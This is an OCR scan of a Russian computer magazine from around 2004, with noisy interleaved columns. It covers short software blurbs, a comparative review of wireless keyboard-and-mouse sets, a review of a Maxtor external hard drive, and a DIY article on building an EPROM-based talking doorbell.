Сразу после установки в IE появляется новый тулбар, при по- 
мощи которого можно собирать картинки с загруженной стра- 
ницы (автоматически, в сфоновом режиме, для всех посещае- 
мых страниц, а также искать картинки при помощи несколь- 
ких поисковиков, грабить картинки по заданным маскам URL), 
блокировать рекламу и попапы, отключать загрузку графики 
и флеша, проговаривать выделенный текст голосом, перево- 
дить страницу, коморортно работать с закладками и т.д. Также 
в панель IE встраивается модуль быстрых групп, что позволя- 
ет открывать множество сайтов (объединенных одной груп- 
пой) одним кликом мыши. Но основное предназначение 
PixGrabber - сбор картинок и закачка их в базу данных. 


Ты можешь создавать подгруппы, искать нужные картинки 
в базе данных, удалять дубли, компоновать списки и под- 
борки картинок для просмотра их в режиме слайд-шоу и 
многое другое. 
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MOZGOPRAV V04.2004 


В мозге человека в зависимости OT состояния созна- 
[>> ния преобладает та или иная частота. Мозгоправ, воз- 
действуя на мозг с определенной частотой, может изменить 
текущее состояние его работы. Хочется спать, а еще столько 
работы - запускай Мозгоправ на бета-диапазон (13Гц-ЗОГц), 
и активное бодрствование через несколько минут тебе обес- 
печено! Проверил на себе - вроде с кофейком работает :). 


А если поставить прогу на гамма-диапазон (ЗОГц-60Гц), 
да со стробоскопом (в полной темноте), можно войти в ре- 
жим измененного сознания (у меня не получилось - кофе 
тут не работает :)). Весит Мозгоправ немного - 20 кило. 


HARD | ТЕСТ КЛАВИАТУР ) 


test_lab (test_lab@gameland 


Тест клавиатур 
Сохрани себя сам 
Новый 250-гиговый винт от Maxtor 


Паяльник 
Рулезный бипер 
[HI еудобно работать с офисными приложениями, когда под руками всего-то и 
есть 102 клавиши да квадратная мышь. Совсем уж неудобно приглашать 
девушку одним глазком взглянуть на алтарь производительности (твою тачку, 
которой ты приносишь в жертву зеленые бумажек), оскверненный затертой, 
залитой напитками клавиатурой, доставшейся по наследству от прабабушки... 


Test_lab благодарит компании ТОР 
(www.tortrade.ru) и Алион (www.alion.ru) 
за предоставленное на тестирование 
оборудование. 


LOGITECH CORDLESS DESKTOP EXPRESS 


Выполненный в мягких тонах, 


этот набор придется по вкусу (an бей че г РЕЯ 
женщинам и детям. Клавиатура не име- количество горячих клавиш: 7 
ет острых углов, мышь утолщается от BS aTT SINE = 
кнопок к спинке. Расположение сфунк- дункциональных клавиш: в 
циональных клавиш нестандартное - ту- стандартное = 
го придется тем, кто владеет методом индикаторы: на ресивере (caps, 
слепой печати. Сами клавиши нажима- num lock) 
ются жестко, с едва уловимым щелчком. интерфейс: ps/2 
Подкладка для кистей не соскакивает, а мышь: 3 кнопки 
прочно держится. Русские и латинские цена: $53 


буквы нанесены соответственно серым 
и черным цветом, что, с одной стороны, 
позволяет выдержать стиль, а с другой - 
мешает их визуальному разделению. 
Дополнительных клавиш управления 
всего 7; установив драйвер, их можно 
переназначить на любые задачи. 

На ресивере расположены два светоди- 
ода - индикаторы Caps и Num lock. Сим- 
метричная мышь (актуально для лев- 
шей) удобно лежит в ладони. 


LOGITECH CORDLESS DESKTOP DELUXE 


Этот набор можно назвать аске- 


тичным - только черный и белый И SS] 


цвета, никаких броских элементов. Чет- количество горячих клавиш: 1 
ко выраженные углы загибаются так, расположение 
как если бы клавиатура оплавилась функциональных клавиш: за 
вследствие продолжительной работы. стандартное = 
Неброское одформление шепчет о го- индикаторы: на ресивере (caps, — 
товности служить 8 часов в сутки, пять Ac С 

В - интерфейс: ps/2 и USB 
дней в неделю. Работать с клавиатурой (переходник) 
действительно приятно, подкладка для мышь: 3 кнопки * 
кистей держится прочно. Даже клави- цена: $62 


и расположены буднично, без празд- 
ничного бардака. Нажимаются легко, 
издавая при этом негромкий хлюпаю- 
ий звук. Дополнительных клавиш 11, 
размещены они, как и положено, на 
верхней грани, дабы не путаться под 
пальцами. Мышь приятно держать в 
руке, жаль только, что кнопок, как и у 
предыдущей модели, всего две. Реси- ) 
вер в точности повторен в этом наборе. | 
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LOGITECH CORDLESS DESKTOP OPTICA 


Ne 


A BOT этого черного жеребца не удер- 

жать в офисе-конюшне. Ему подавай 
такой же черный монитор и такие же оплыв- 
шие колонки. Клавиши управления гром- 
костью заменены поворотным регулятором, 
что очень удобно, ибо несет в себе еще и 
индикаторную функцию. Дополнительных 
кнопок по сравнению с двумя предыдущими 
моделями прибавилось - теперь их 19. Поми- 
мо регулятора громкости слева появился ро- 
лик iNav. Он претендует на замену колеса 
прокрутки мыши при работе в офисных при- 
ложениях, так как, в случае когда обе руки 
на клавиатуре, тянуться к нему все же бли- 
же. И снова стандартно расположенные кла- 
виши, только на сей раз жесткие и громкие. 
Ресивер ничуть не изменился, а вот мышь 
обросла пористыми накладками, чтобы не 
скользить в самые жаркие моменты, стала 
несимметричной, обзавелась дополнитель- 
НОЙ КНОПКОЙ. 


9.9.9.9. 


количество горячих клавиш: 19 
+ F1-F12 (Office lock) 


расположение 
функциональных клавиш: 
стандартное 


индикаторы: на ресивере (caps, 
num lock) 

интерфейс: ps/2 

мышь: 3 кнопки 

цена: $39 


LOGITECH INTERNET NAVIGATOR KEYBOARD 


Сей продукт предназначен для тех, кто 

чертовски доволен своей мышью, но 
не клавиатурой. Всем тем, кто, читая 
предыдущий тест, капал слюной на пол, 
Logitech дарит возможность приобщиться к 
прекрасному за меньшую сумму, выпустив 
отдельно клавиатуру, правда, хвостатую 
(ps/2). Снова подставка для кистей рук, 
снова жесткие, но уже более тихие в работе 
клавиши. Модель белого цвета явно 
проигрывает во внешнем виде acppo-ane... 
черным собратьям. Как оправдание, 
гармоничное сочетание с белым же 
монитором. Русские и латинские буквы 
вновь нанесены одним цветом. 


kkk 


количество горячих клавиш: 21) 
+ F1-F12 (Office lock) 
расположение 
функциональных клавиш: 
стандартное 

индикаторы: caps, num, scroll, - 
Office lock = 
wHTepcpenc: usb (переходник 
Ha ps/2) 

мышь: нет 


цена: $34 


i 


Любителям оскаленных карманных 
помощников эта вещица придется по 
вкусу. «Голубой зуб», он же Bluetooth, 
призван соединять по радиоканалам лю- 
бые устройства, поддерживающие его. Так 
вот, ресивер данной модели по совмести- 
тельству еще и Bluetooth-xa6, он же прию- 
Tun на себе индикаторы caps lock, num lock 
и Office lock. Более того, это и зарядка gna 
аккумуляторов. Клавиатура? Верно, все та 
же черная красавица, 19 горячих клавиш, 
поворотный регулятор громкости, колесо 
прокрутки. Кнопки, как и положено полно- 
фрорматной клавиатуре, жесткие, громкие. 
И без того приятное впечатление усилива- 
ет мышь - МХ7О0 (внимание: частота опро- 
са - около 50 Гц). Удобно держать, удобно 
бросать, а вот ловить - не очень. К компь- 
ютеру это добро подключается через ин- 
терфейс PS/2, иначе не зайти в BIOS, не 
поработать в DOS и прочее - Bluetooth pa- 
ботает лишь после загрузки драйвера. 


LOGITECH CORDLESS DESKTOP MX FOR BLUETOOTH 


количество горячих клавиш: 19 
+ F1-F12 (Office lock) + ролик 
прокрутки + поворотный 
регулятор громкости 
расположение 
функциональных клавиш: 
стандартное 

индикаторы: на ресивере (caps, 
num, Office, scroll lock) 
интерфейс: ps/2 и USB 


мышь: 8 кнопок 
цена: $190 
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@СЯ то тЕСТКлАВИАТУР ) 


LOGITECH DINOVO MEDIA DESKTOP 
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Стильная, почти что уникальная пери- 

qpepna. Прямые углы, клавиши по раз- 
меру чуть больше обычных, с уменьшенным 
ходом (почти беззвучные). Удлиненная грань 
заменяет подставку для кистей (и здесь 
функциональность уступила место дизайну - 
пусть предостерегутся владельцы компью- 
терных столов с лотками для клавиатур). 
Восьмикнопочная мышь - MX900, частота ее 
опроса - 80 Гц (пусть будут осмотрительны 
любители 3D action). Ресивер такой же, как и в 
предыдущей модели. Стоит отдельно отметить 
цифровую клавиатуру (MediaPad), вынесен- 
ную как отдельный блок. Она сочетает в себе 
функции калькулятора, непосредственно кла- 
виатуры и пульта ДУ (в том числе благодаря 
наличию медиаклавиш), ибо тоже с голубым 
зубом (радиус действия - go 10 м). Трехстроч- 
ный ЖК-дисплей способен отображать не 
только цифры (как и положено калькулятору), 
но и текущий музыкальный трек. Браво! 


количество горячих клавиш: 11 
+ 8 на MediaPad 


расположение 
функциональных клавиш: 
стандартное 


индикаторы: на ресивере (caps, 
Office lock) 


интерфейс: ps/2 и USB 


мышь: 8 кнопок 


цена: $318 


CREATIVE DESKTOP WIRELESS 8000 


Набор выполнен в модном сочетании 

черного и серебряного цветов. Нажа- 
тие клавиш довольно упругое, глубокое, 
беззвучное. Подкладка для запястий сидит 
неплотно, есть зазор, который, вероятно, бу- 
дет собирать грязь. Символы латиницы на- 
несены белым, а кириллицы - бордовым цве- 
том. Для того чтобы разглядеть их, потребу- 
ется яркий источник света. Ролики прокрут- 
ки на клавиатуре и на мыши издают pasgpa- 
жающий громкий звук. Из-за талии мышь 
будет неудобно держать людям с большой 
ладонью. Более того, мышь теряет связь с 
ресивером уже на расстоянии в 130 см. Отсу- 
тствуют индикаторы Caps и Num lock. 


kk 


количество горячих клавиш: 21 
+ ролик прокрутки 
расположение 
функциональных клавиш: 
стандартное 


индикаторы: нет 


интерфейс: USB 


мышь: 3 кнопки 


цена: $57 


A4 TECH WIRELESS DESKTOP KBS-21533RP 


Сочетание черного и серебряного цве- 

тов - производители наверняка хоте- 
ли угодить владельцам ЖК-мониторов, окра- 
шенных обычно именно в эти цвета. С мо- 
лочно-белым электролучевым радиатором 
на столе гармонии не добиться. Клавиши А- 
образной формы - проявление заботы о на- 
щих кистях. В самом деле, если заставить се- 
бя пройти через пару часов промахов по 
кнопкам, можно выбраться из терний к звез- 
дам. Однако вот что странно: намекая таким 
образом на эргономичность, производитель 
совсем забыл об упоре для кистей рук. На- 
жимаются клавиши звучно, чуть мягче при- 
вычного. 16 горячих клавиш полностью пе- 
репрограммируемы. Отсутствуют какие-либо 
индикаторы Caps и Num lock, мониторить эти 
режимы можно после установки ПО (с диске- 
ты). Простая мышь дополняет картину - на- 
бор явно офисный. Ресивер умеет заряжать 
батарейки типа ААА, принимает сигнал кла- 
виатуры более чем с 5 м, амыши - 2,5 м. 


количество горячих клавиш: 16 


расположение 
функциональных клавиш: 
стандартное 


индикаторы: нет 


интерфейс: ps/2 


мышь: 3 кнопки 


цена: $38 
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Прямоугольный вариант, снова серебряно-черные 

тона. Выглядит лучше, аккуратнее предшественни- 
ка, на вес клавиатура оказалась легче. Клавиши снова А- 
образные, и снова нет подставки для кистей. Поменялась 
мышы: теперь она не расширяется, а сужается к запястью, 
но все те же три кнопки. Пару слов о ресивере: вообще, он 
может заряжать батареи и при выключенном компьютере, 
если тот умеет включаться по нажатию заданной клави- 
ши (или их сочетания). Батареи (ААА, которые заряжает 
ресивер), прилагающиеся в количестве 4 штук, разряжа- 
ются грызуном катастросрически быстро (ситуация повто- 
ряется и с A4 tech Wireless Desktop KBS-21533RP). Горячих 
клавиш 17, все они могут перепрограммироваться. Снова 
отсутствуют индикаторы Caps и Num lock. Расположение 
Ффункциональных клавиш (а! home, end, ins, pg up/down), 
как ив предыдущем варианте, нестандартно и едва ли 
удобно - это, скорее, еще один элемент дизайна. 


A4 TECH WIRELESS DESKTOP KBS-1527RP 


количество горячих клавиш: 17 | 


расположение 
функциональных клавиш: 
стандартное 

индикаторы: нет 
интерфейс: ps/2 

мышь: 3 кнопки 

цена: $34 


A4 TECH WIRELESS DESKTOP KBS-2548RP 


Несбалансированный набор. Вспомогательная 

клавиатура расположена не справа, а слева, при- 
чем еще и зеркально отражена. Рано радуются левши - 
мышь несимметричная, под правую руку. Теперь вла- 
дельцу такого серебряно-черного друга придется пора- 
ботать над собой, чтобы научится вбивать цифры ле- 
вой рукой (краски сгущает зеркальное отражение ря- 
дов циорр). Положение может спасти ролик прокрутки 
текста, расположенный на правом ребре клавиатуры. 
Горячих клавиш стало 19, клавиши F1-F12 могут менять 
свое назначение, они, по сути, тоже горячие. И снова 
обескураживает отсутствие светодиодов, сигнализиру- 
ющих, в том числе, и о режиме клавиш FI-F12 (для них, к 
сожалению, не поможет даже установка ПО). Мышь 
удобно пожится в руку, несимметричная. Ресивер же 
несмотря на свою идентичность неустойчив, теряет сиг- 
нал мыши Ha 1,5 м, а клавиатуры - на 2,5 м. 


количество горячих клавиш: 19} 
+ F1-F12 (Office lock) + ролик з 
прокрутки (справа) 


расположение 
функциональных клавиш: 
стандартное 


индикаторы: нет 
интерфейс: USB 


мышь: 3 кнопки 
цена: $46 


Все та же цветовая гамма, все те же наклонные 

А-образные клавиши. Наконец-то появилась 
подставка gna кистей рук. Как всегда в таких случаях, 
владельцам компьютерных столов стоит удостове- 
риться в том, что нажимать горячие клавиши, распо- 
ложенные по верхней грани, при использовании 
подставки будет сподручно. Колесико для прокрутки 
текста на сей раз расположено удобно, а 21 горячую 
клавишу, как всегда, можно перепрограммировать по 
своему желанию. Нестандартное расположение 
функциональных клавиш и отсутствие светодиодов - 
это те самые капли дегтя в бочке меда. Отдельного 
внимания достойна мышь: сразу за ее роликом рас- 
положились клавиши 200+ и 200-. 


количество горячих клавиш: 21 
+ ролик прокрутки 


расположение 
функциональных клавиш: 
стандартное 


индикаторы: нет 
интерфейс: USB 
мышь: 5 кнопок 
цена: $43 


DEFENDER WIRELESS MULTIMEDIA SET $ МВ $-1080 W (WRS 1080 В) 


Две эти модели отличаются лишь цветом: W - 

молочно-белая с добавлением серого на гра- 
нях, а В - черная. И если в первом случае буквы ки- 
риллицы обозначены красным, а латиницы - черным, 
то во втором случае и та и другая раскладки одинако- 
во белые. Впрочем, это не должно останавливать тех, 
кто печатает, не глядя на клавиатуру. Это самая что 
ни на есть стандартная клавиатура с 18 горячими кла- 
вишами, без каких-либо изысков. Нажатие клавиш 
достаточно тихое. Подходит для того, чтобы не спеша 
клацать в комнате, где спит человек. Однако простая 
двухкнопочная мышь своим ревом при вращении ко- 
лесика нарушает идиллию. Подобно моделям от A4 
tech отсутствуют индикаторы Caps, Num, Scroll lock. 


количество горячих клавиш: 
18 


расположение 
функциональных клавиш: и" 
стандартное 

индикаторы: нет 
интерфейс: USB 
мышь: 3 кнопки 


цена: $35 
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GERHARD TEcT КЛАВИАТУР ) 


DEFENDER WIRELESS MULTIMEDIA SET M WR 


Эта клавиатура еще ближе к тому об- 
разу, что сложился в умах пользовате- 


лей, - никаких изысков и дизайнерских ухищ- количество горячих клавиш: 17 fy 


рений, даже горячие клавиши, коих 17, распо- расположение 
ложены равномерно в одну линию. Подклад- функциональных клавиш: 
стандартное 


ка для кистей несколько увеличивает клави- 
атуру в размере, но работать с горячими кла- 
вишами и в таком случае удобно, сидя за 
компьютерным столом. Клавиши издают eg- 
ва слышный шорох, нажимаются мягко. Сим- 
волы кириллицы и латиницы нанесены оди- 
наковым шрисфтом и цветом, так что визуаль- 
но очень сложно их отличать. И Defender 
наступил на излюбленные грабли Ad tech - 
индикаторов Caps lock и Num lock нет. Гры- 
зун, как и положено стандартному, симметри- 
чен. По сложившейся традиции он не то ква- 
кает, не то урчит при вращении колесика. 


индикаторы: нет 
интерфейс: ps/2 
мышь: 3 кнопки 
цена: $24 
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DEFENDER WRS 2050 PHANTOM 


Черная с вкраплениями серебряного 
цвета, эта клавиатура оказывается в 


полтора раза шире стандартной. Нижняя количество горячих клавиш: 


грань вытянута к пользователю, призывая 18 + ролик прокрутки + 
водрузить на себя запястья. Не тут то было - поворотный регулятор 
громкости 


запястья попадают как раз на край ребра, 


что отнюдь не является эргономичным. Кла- 


расположение 
функциональных клавиш: 


виши гулко шуршат, нажимаются с легким стандартное 

усилием. Присутствует колесико для прок- индикаторы: Battery charge 
рутки текста и поворотный регулятор гром- интерфейс: USB 

кости. Всего 8 из 18 горячих клавиш подода- мышь: 4 кнопки 


ются дрессировке (перепрограммирова- цена: $36 
нию). Из всех нужных индикаторов только 
один - низкого уровня зарядки батарей (эта 
проблема решается после установки ПО). 
Расположение сфункциональных клавиш 
нестандартное. Четырехкнопочная мышь 


снова квакает, но уже чуть тише. 


DEFENDER WRS 2080 CARDINA 


Mano Toro, что эта клавиатура в полтора 
раза шире предшественницы, так к ней 


еще пристегивается подставка для кистей! В количество горячих клавиш: || 2 
итоге, сидя за компьютерным столом, достать 32 + FI-F12 (Office lock) + ролик || i EST 
gO горячих клавиш невозможно в принципе. А прокрутки + поворотный "в =" . ) 


BUY 2004 


регулятор громкости " 


расположение 
функциональных клавиш: 


их, к слову сказать, ни много ни мало, 44, это 
вместе с F1-F12 (переключение режимов с по- 


мощью Office lock). Тут и ролик прокрутки текс- стандартное 

та, и поворотный регулятор громкости, и все индикаторы: на ресивере (caps, 

остальное, что только можно вообразить. Под- num, scroll, Office lock, Battery 

даются дрессировке только 12 горячих кла- charge) f = 


интерфейс: ps/2 
мышь: 4 кнопки 
цена: $42 


виш. Клавиатура тихая, едва-едва шуршит при 
нажатии клавиш. Ресивер помимо своих ос- 
новных задач мониторит режимы Caps, Num 
Office, Scroll lock и низкий уровень зарядки ба- 
тарей. Мышь четырехкнопочная, при этом чет- 
вертая, так удобно расположившаяся клави- 
ша нажимается чересчур легко, что может по- 
мешать импульсивным игрокам. 


ВЫВОДЫ перемещение по папкам, кто-то хочет украсить рабочий 


7 стол эксклюзивной вещицей, а кое-кто намерен купить 
Каждый выбирает по вкусу: кому-то хочется все 


клавиатуру для этой жизни, не тратить денег впустую. 
привязать к горячим клавишам, чтобы не терять время на Благо, есть из чего выбирать. 
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test_lab (test_lab@gameland.ru) 


НОВЫЙ 250-ГИГОВЫЙ ВИНТ OT MAXTOR 


Совсем недавно ком- 
пания Maxtor npegcta- 
вила новую серию 
внешних винчестеров 
OneTouch (в линейку 
входят модели объемом 80, 120, 160, 
200, 250 и 300 Гб). По большей части 
они предназначены для резервного 
сохранения данных (backup), что, 
собственно, и обозначается произво- 
дителем. 

Поговорим подробнее о 250-гиговом 
винчестере Maxtor. Диск можно ис- 
пользовать не только для бэкапа, 
ведь 250 Гб на борту и скоростные 
интерфейсы позволяют работать с 
данными на высоких скоростях (см. 
технические характеристики). 

У девайса имеется ряд интересных 
особенностей. Кроме горячей замены 
(которая поддерживается самими ин- 
терфейсами USB и FireWire), имеется 
возможность настройки кнопки на пе- 
редней панели, по умолчанию являю- 
щейся кнопкой бэкапа, на запуск 
программы или выполнение систем- 
ной функции (та самая "OneTouch" - 
"одно прикосновение"). Правда, для 
задействования этой функции нужно 
установить прилагающееся ПО (Dantz 
Retrospect Express). К слову сказать, в 
Windows ХР SP2 для установки вин- 
честера даже не требуется диск с 
драйверами, поскольку ОС сама опре- 
деляет и устанавливает устройство. 
Есть еще одна немаловажная особен- 
ность - управление питанием, причем 
реализована она двумя способами: в 
ручном и автоматическом режимах. В 
ручном режиме управление осущес- 
твляется посредством выключателя 
на задней панели устройства (то есть 
когда не требуется работа с HDD, 
можно просто его отключить, не вы- 
нимая из розетки). Второй способ: при 
помощи входящих в комплект утилит 
можно настроить время, через кото- 
рое винчестер уходит в спящий ре- 
жим и затем отключается. 

Теперь о начинке. Интерфейс 
FireWire собран на чипсете Oxford 911, 
что гарантирует высокие качество и 
скорость работы при подключении на- 
копителя через соответствующий 
разъем, причем поддерживаются ско- 
рости до 400 Мб/сек (по шине). А вто- 
рой разъем IEEE 1394 дает возмож- 
ность подключения дополнительных 
устройств, которые используют 
FireWire, непосредственно к HDD. Mo- 


ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 
Модель: AOIA250 


Объем винчестера: 250 Гб 


Обороты: 7200 грт 


Размер кэша: 8 Мб 


Время доступа: <9.3 мс 


Скорость передачи данных (максимальная): 
USB2 - 34 Мб/сек, FireWire - 41 Мб/сек 


Интерфейсы: 2xFireWire (IEEE 1394), USB 1.1/2.0 


Поддержка платформ: PC, Мас 


Размеры: 41х14 0х210 мм 


Вес: 1.38 кг 


Питание: адаптер 100-220 В, 47-63 Гц 


Минимальные системные требования: 

PC: РИ, Windows 98/МЕ/2000/ХР, 64 Мб ОЗУ, 
свободный FireWire или USB порт 

Mac: iMac/PowerMac G3, MacOS 9.1/MacOS X 
(10.1.2-10.1.5,10.2.4), свободный FireWire или USB 
nopt 


тор выполнен с использованием KUG- 
костных динамических подшипников, 
и поэтому работающий винчестер 
практически не слышно даже при ак- 
тивной передаче данных. 

Корпус сделан из алюминия, благо- 
даря чему внешние повреждения де- 
вайсу не страшны, а во избежание 
перегрева и выхода из строя на 3ag- 
ней панели установлен один малень- 
кий вентилятор, который, однако, неп- 
лохо продувает HDD. В комплекте с 
винчестером имеется подставка, при 
помощи которой жесткий диск можно 
установить в вертикальном положе- 
нии, но из-за отсутствия крепления 
станина будет отваливаться при пе- 
ремещении всей конструкции с места 
на место. 

Разработчики позаботились и о лю- 
бителях макинтошей, представив спе- 
циально замоденную модель, а BOT с 
семейством операционных систем *nix 
устройство работать не будет, так как 
официальная поддержка отсутствует. 

В итоге, имеем отличный девайс для 
бэкапа данных или работы с мульти- 
медиаконтентом, быстрый, большой и 
удобный в работе. 
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ПАЯЛЬНИК 


РУЛЕЗНЫЙ БИПЕР 


еня всегда раздражали обыкновенные дверные звонки. Ну что прикольного в простом звоне? Гораздо круче, 
когда звонок может приветствовать гостя или, наоборот, посылать его :). 


обственно набор зву- 


ков, равно как и приме- 


нение сего девайса, ог- 


раничивается только 
твоей срантазией. Пос- 
мотри на схему, что на рис. 1. Испугал- 
ся? Зря. Несмотря на порядочное ко- 
личество компонентов, эта схема не 
сложнее схемы трубопровода в кло- 
зете, и сейчас я это тебе докажу. Об- 
рати внимание, что она разбита на 
два узла - так ее и собирать проще, и 
отлаживать. 

Итак, узел первый - цифровой (хотя 
правильнее было бы его назвать 
цифро-аналоговым). Обо все по по- 
рядку. А по порядку для порядка рас- 
положена микросхема DDI и окруже- 
ние из дискретных элементов. Если 
тебе интересно ее внутреннее устрой- 
ство, взгляни на рис. 2. 

В принципе, ничего сложного: четы- 
ре элемента 2И-НЕ, объединенных на 
одну подложку, из которых использу- 
ются только два. На элементах DD1.1 и 
001.2 (а также RI, R2 и Cl) собран так- 
товый генератор. Причем частоту на 
выходе (выв. 1) можно регулировать 
(резистором R2) в некоторых преде- 
лах, соответственно изменяя скорость 


Oa mea? 


счетчика 002 (выв. 10). Вход называ- 
ется «С» - сокращение от буржуйско- 
го слова «clock» (счет). Названия всех 
остальных выводов приведены на 
рис. 3. 


002 КР1561ИЕ?0 


воспроизведения звуков. Помимо ско- 
рости меняется и тональность. Вполне 
реально заставить бипер говорить 
как голосом Буратино, так и голосом 
Карабаса-Барабаса. Генерируемый ге- 
нератором сигнал поступает через пе- 
реключатель SA2 на один из входов 
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Другим немаловажным входом яв- 
ляется Р (сокращение от слова 
«reset» - сброс) (выв. 11). Сигнал сбро- 
са формируется автоматически при 
подаче питания. И как результат сим- 
биоза сигналов clock и reset - пооче- 
редное появление лог. 1 на выв. 01-012 
(сокращение от слова «quit» - выход). 
Это нужно для перебора адресов (АО- 
АП) программируемой микросхемы па- 
мяти 051. Всех, кроме самого старше- 
го. В нашем случае старшим адресом 
микросхемы является Al2. Это сдела- 
но специально gna того, чтобы ты мог 
оперативно выбрать (кнопкой SA) 
воспроизводимый сфрагмент. Скажем, 
если ты дома - звонок всех привет- 
ствует, ушел - всех посылает... 

Но прежде чем что-либо программи- 
ровать, давай сначала попытаемся по- 
нять, как устроено ПЗУ и как, собствен- 
но, происходит процесс записи/считы- 
вания. Нам, в принципе, не важно, что 
находится внутри ПЗУшки (ничего ин- 
тересного - куча полевых транзисто- 
ров с плавающим затвором :-)), глав- 
ное, что ее выводы делятся на четыре 
группы. Первая группа - питание мик- 
росхемы. В нее помимо +Ucc и GND 
входит напряжение программирова- 
ния Урр. Напряжение программирова- 


ния у разных микросхем различно, HO 
всегда пишется на корпусе вместе с 
маркировкой (в нашем случае +12,5 
В). Естественно, что без подачи этого 
напряжения ни о какой записи не мо- 
жет быть и речи. 

Во вторую группу входят управляю- 
щие сигналы. Они представлены в 
табл. 1. 


Сигнал Описание 


Uwp Запрет записи (write protect) 
OE Разрешение выхода (output enable) 
cs. Выбор кристалла (chip select) 


Табл. 1. Сигналы DS1 


Uwp (иначе РСМ - разрешение прог- 
раммирования) - при подаче лог. 1 на 
данный вывод происходит блокировка 
записи. Соответственно, для разреше- 
ния программирования необходимо со- 
единить этот вывод с общим проводом. 


ОЕ - черта над символами говорит о 
том, что сигналом является лог. 0. (Во- 
обще-то, правильнее было бы гово- 
рить, что активным сигналом является 
инверсный по отношению к осталь- 
ным. В нашем случае справедливы 
оба утверждения.) При подаче пог. 0 
на этот вход все выходы блокируются. 


CS - выбор кристалла. В случае ис- 
пользования нескольких микросхем 


при подаче лог. О на данный вывод 
можно выбрать требуемую в данный 
момент времени. Так как ПЗУ у нас од- 
на, то этот вывод жестко привязан к 
общему проводу. 

К третьей группе относится шина 
данных (ШД). Это, кстати сказать, 
единственная группа, где сигналы мо- 
гут не только входить в микросхему, 
но выходить из нее. Как ясно из наз- 
вания, по этой шине данные, 
собственно, и носятся. 

Последней группой является адрес- 
ная шина (ША). Название тоже не 
финтиперстовое, и из него понятно, 
что при подаче соответствующих сиг- 
налов на эти входы происходит вы- 
борка адресов - ячеек памяти. У ША 
иу ШД активному уровню соответ- 
ствует лог. 1. Переход из режима за- 


Рис. 4. Цоколевка некоторых микросхем 
памяти 


Ш Вообще-то, в книгах этому электроприбору посвящяют не одну 
страницу. Но я постараюсь быть более кратким. Свое название би- 
полярный транзистор получил благодаря носителям заряда. У него 
их два: электроны (п) и дырки (р). А выводов три. Вывод, идущий с 


середины крис- 
Tanna, принято 
называть базой, 
вывод, сливаю- 
щий (эмиттирую- 
щий) заряды, - 
эмиттером, ну а 
собирающий все 
эмиттированные 
заряды - кол- 
лектором. На 
рисунке они так 


и обозваны. Но 
самое интересное не в этом, а в том, что если закрыть базу и поза- 
быть о том, что в области базы содержится куча примесей, то мож- 
но сказать о биполярном транзисторе, что он диод :-). Соответ- 
ственно, и включается в схему он по законам диода, то есть имеет 


свои плюс и минус. Не нужно быть 


Транзисторы бывают разные 


Лобачевским, чтобы догадаться 


о всего двух вохможных вариантах расположения плюса и минуса. 


Тот транзистор, на коллектор ко- 
торого подается плюс, называется 
п-р-п, ну а тот, где плюс подается 
на эмиттер, - р-п-р. На базу обычно 
подается сигнал, в качестве кото- 
рого может выступать что угодно, 
даже постоянный ток. В нашем 
случае транзистор имеет структу- 
ру Р-п-р и типономинал у него 
KT3107. 


Цоколевка транзистора 


Объем ПЗУ Наше Забугорное 
К57ЗРФ2, 
2Кх8 К57ЗРФЕ 27016 
K573P4, 
8Kx8 K573P@6 27064 
16Kx8 27C128 
32 Кх8 К573РФ8 270256 


писи в режим чтения осуществляется 
с помощью переключателя SA2. 
Кульминацией всего вышесказанно- 
го является то, что изображено на 
рис. 4, на котором в виде сводной 
таблицы представлена цоколевка не- 
которых микросхем. 

Ну а соответствие объема конкрет- 
ным номиналам микросхем прослежи- 
вается в табл. 2. 

Теперь полученных знаний вполне 
достаточно для того, чтобы не только 
собрать программатор, но и самому 
написать сост под него. Однако со- 
бирать отдельный программатор ра- 
ди одной микросхемы - это как-то не 
по-нашему. Будет проще объединить 
программатор и нашего попугая в Og- 
ну схему, а шину данных кинуть на 
LPT1 порт компа. Что, как видишь, и 
сделано. Кроме ШД на порт кинут 
вход С 002. Зачем, если у нас уже 
есть тактовый генератор? Дело в том, 
что при записи в ПЗУ возникает трабл 
- проблема синхронизации тактовых 
импульсов с записываемыми данны- 
ми. В моем случае она решена самым 
радикальным способом - отрубанием 
генератора от входа С и подачей на 
него (вход) внешних тактирующих 
импульсов. Импульсы генерирует вы- 
ход Строб порта LPT1. 

Вернемся к ШД. Как видно из того 
же рис. 1, на ШД нагружена цепочка 
резисторов R4-Ril, R12-R19. С no- 
мощью них и происходит преобразо- 
вание цифрового сигнала в аналого- 
вый, то есть в звук. Этот узел относит- 
ся к классическим и на языке виртуо- 
зов паяльника называется "ЦАП R- 
28". Далее, уже аналоговый сигнал, 
проходит через не менее классичес- 
кий узел - ВС-фильтр, выполненный 
на элементах R20, C4. Однако гром- 
кости получаемого на выходе сигнала 
достаточно, лишь чтобы нагрузить 
его на высокоомные наушники. Есте- 
ственно, нас это не удовлетворяет. И 


Рис. 5. Узел 2, аналоговый 
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TYT на сцену выходит другой узел, 
изображенный на рис. 5. 

Каскад на транзисторе \Т1 - npegBa- 
рительный усилитель. Переменным 
резистором R22 регулируется гром- 
кость. Резистором R21 задается необ- 
ходимое смещение gna \/Т1. Звуковой 
сигнал снимается с эмиттера этого 
транзистора и подается через разде- 
лительный конденсатор С6 на вход 
микросхемы DAZ. Ты уже наверно 
знаешь, что промышленность дошла 
go того, что стала выпускать OGHOK- 
ристальные усилители. Спец о них 
уже писал не раз, и это - еще один ва- 
риант простого усилка (XS #05(1) за 
2001 г.), а, по моему скромному мне- 
нию, и самый простой вариант. Про 
микросхему DAI ты уже знаешь, рав- 
но как и про конденсатор С5. 


КОНСТРУКТИВ 

Самая главная микросхема - ПЗУ - 
представлена на рис. 6, счетчик DD2 - 
на рис. 7, ана рис. 8 уютно располо- 
жилась DDI. DAI ты уже видел, а OG- 
нокристальный усилитель DA2 изоб- 
ражен на рис. 9. 

Кроме микросхем, нам понадобятся 
панельки. В принципе, обязательной 
является только панелька для DSI, 
потому что ее можно оперативно за- 
менить, но я все же рекомендую пос- 
тавить панели и под остальные мик- 
рухи. Ведь последние к тебе могут по- 
пасть различными путями, и нет га- 
рантии, что они стопроцентно целые. 
Практически все панельки, продаю- 
щиеся в магазинах, забугорные, но 
лучше попытаться отыскать отечест- 
венные с позолоченными контактами, 
хотя бы gna DSI. Они на пару-тройку 
червонцев дороже, но того стоят. Пе- 
ременные резисторы (R5 и R25) мож- 
но применить любые, естественно, 
подходящие по номиналу. Например, 
я использовал CI13-4a (рис. 1). Посто- 
янные резисторы - ОМЛТ-0125 или 
ОМЛТ-0.25 с номиналами, указанны- 
